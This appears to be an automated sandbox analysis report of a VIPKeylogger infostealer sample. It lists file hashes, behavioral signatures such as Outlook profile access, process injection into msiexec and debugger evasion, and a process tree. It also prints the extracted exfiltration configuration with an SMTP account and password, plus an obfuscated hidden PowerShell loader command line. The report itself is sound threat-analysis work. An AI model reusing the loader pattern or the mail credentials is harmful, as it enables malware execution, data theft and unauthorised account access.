Analysis
- max time kernel: 144s
- max time network: 148s
- platform: windows10-2004_x64
- resource: win10v2004-20241007-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 22-10-2024 12:26
Static task
- static1
Behavioral tasks
- behavioral1: sample 001_215_EA2047939_202410210815.exe, resource win7-20241010-en
- behavioral2: sample 001_215_EA2047939_202410210815.exe, resource win10v2004-20241007-en
- behavioral3: sample Kontokurantens.ps1, resource win7-20240708-en
- behavioral4: sample Kontokurantens.ps1, resource win10v2004-20241007-en
General
- Target: 001_215_EA2047939_202410210815.exe
- Size: 867KB
- MD5: 25da279ad7ee7cc3b8d3e5cd5aa4b5b2
- SHA1: d1fc6cbe8d8cca235ed29de6b109a0cb951eb5f3
- SHA256: 963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0
- SHA512: db074cfe6c006f194b8b4ca983fb83a88229beb229504c8eba07140fe490974e90dfe75b66b9c4d81bd319fdaaccc822473064771b7ac8d333012859f139498e
- SSDEEP: 12288:l9Zwb4/I1H06OdtVQuqilUSDFOIBETeVlCE7vkQymGwSW01hXqvjoaCi7lnsZz0W:/dPFtVtOIB+alCJmvulW6Nd0vu
Malware Config
Extracted: vipkeylogger
- Protocol: smtp
- Host: smtp.ionos.fr
- Port: 587
- Username: [email protected]
- Password: Jc.2o3o@
- Email To: [email protected]
Signatures
- VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C#; it resembles SnakeKeylogger, which was first observed in 2020.
- Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)
Run PowerShell and hide display window.
Processes (pid, process):
  4708 powershell.exe
  448 powershell.exe
- Accesses Microsoft Outlook profiles (1 TTPs, 6 IoCs)
Processes (description, ioc, process):
  Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  msiexec.exe (2 IoCs)
  Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  msiexec.exe (2 IoCs)
  Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  msiexec.exe (2 IoCs)
- Blocklisted process makes network request (16 IoCs)
Processes (flow, pid, process):
  flows 30, 35, 37, 44, 52, 63, 65, 71: 1520 msiexec.exe
  flows 31, 34, 38, 45, 51, 68, 69, 73: 4384 msiexec.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)
- Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes (flow, ioc):
  flow 62: checkip.dyndns.org
- Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
Processes (pid, process):
  1520 msiexec.exe
  4384 msiexec.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger (4 IoCs)
Processes (pid, process):
  448 powershell.exe
  4708 powershell.exe
  1520 msiexec.exe
  4384 msiexec.exe
- Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTPs, 5 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes (description, ioc, process):
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  msiexec.exe (2 IoCs)
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  001_215_EA2047939_202410210815.exe
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe (2 IoCs)
- NSIS installer (2 IoCs)
Processes (resource, yara_rule):
  C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\001_215_EA2047939_202410210815.exe  nsis_installer_1
  C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\001_215_EA2047939_202410210815.exe  nsis_installer_2
- Suspicious behavior: EnumeratesProcesses (22 IoCs)
Processes (pid, process):
  4708 powershell.exe (9 IoCs)
  448 powershell.exe (9 IoCs)
  1520 msiexec.exe (2 IoCs)
  4384 msiexec.exe (2 IoCs)
- Suspicious behavior: MapViewOfSection (2 IoCs)
Processes (pid, process):
  448 powershell.exe
  4708 powershell.exe
- Suspicious use of AdjustPrivilegeToken (46 IoCs)
Processes (description, pid, process):
  448 powershell.exe and 4708 powershell.exe, each (22 IoCs): Token: SeDebugPrivilege (twice), SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  1520 msiexec.exe: Token: SeDebugPrivilege
  4384 msiexec.exe: Token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (14 IoCs)
Processes (description, pid, process, target process):
  PID 1844 001_215_EA2047939_202410210815.exe wrote to memory of 4708 powershell.exe (3 IoCs)
  PID 1844 001_215_EA2047939_202410210815.exe wrote to memory of 448 powershell.exe (3 IoCs)
  PID 448 powershell.exe wrote to memory of 1520 msiexec.exe (4 IoCs)
  PID 4708 powershell.exe wrote to memory of 4384 msiexec.exe (4 IoCs)
- outlook_office_path (1 IoCs)
Processes (description, ioc, process):
  Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  msiexec.exe
- outlook_win_path (1 IoCs)
Processes (description, ioc, process):
  Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  msiexec.exe
Processes
C:\Users\Admin\AppData\Local\Temp\001_215_EA2047939_202410210815.exe (PID 1844)
  Command line: "C:\Users\Admin\AppData\Local\Temp\001_215_EA2047939_202410210815.exe"
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 4708)
    Command line: "powershell.exe" -windowstyle hidden "$Seppo=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kontokurantens.Unc';$Underviseren=$Seppo.SubString(52189,3);.$Underviseren($Seppo)"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\msiexec.exe (PID 4384)
      Command line: "C:\Windows\SysWOW64\msiexec.exe"
      - Accesses Microsoft Outlook profiles
      - Blocklisted process makes network request
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - outlook_office_path
      - outlook_win_path

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 448)
    Command line: "powershell.exe" -windowstyle hidden "$Seppo=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kontokurantens.Unc';$Underviseren=$Seppo.SubString(52189,3);.$Underviseren($Seppo)"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\msiexec.exe (PID 1520)
      Command line: "C:\Windows\SysWOW64\msiexec.exe"
      - Accesses Microsoft Outlook profiles
      - Blocklisted process makes network request
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Enterprise v15
Downloads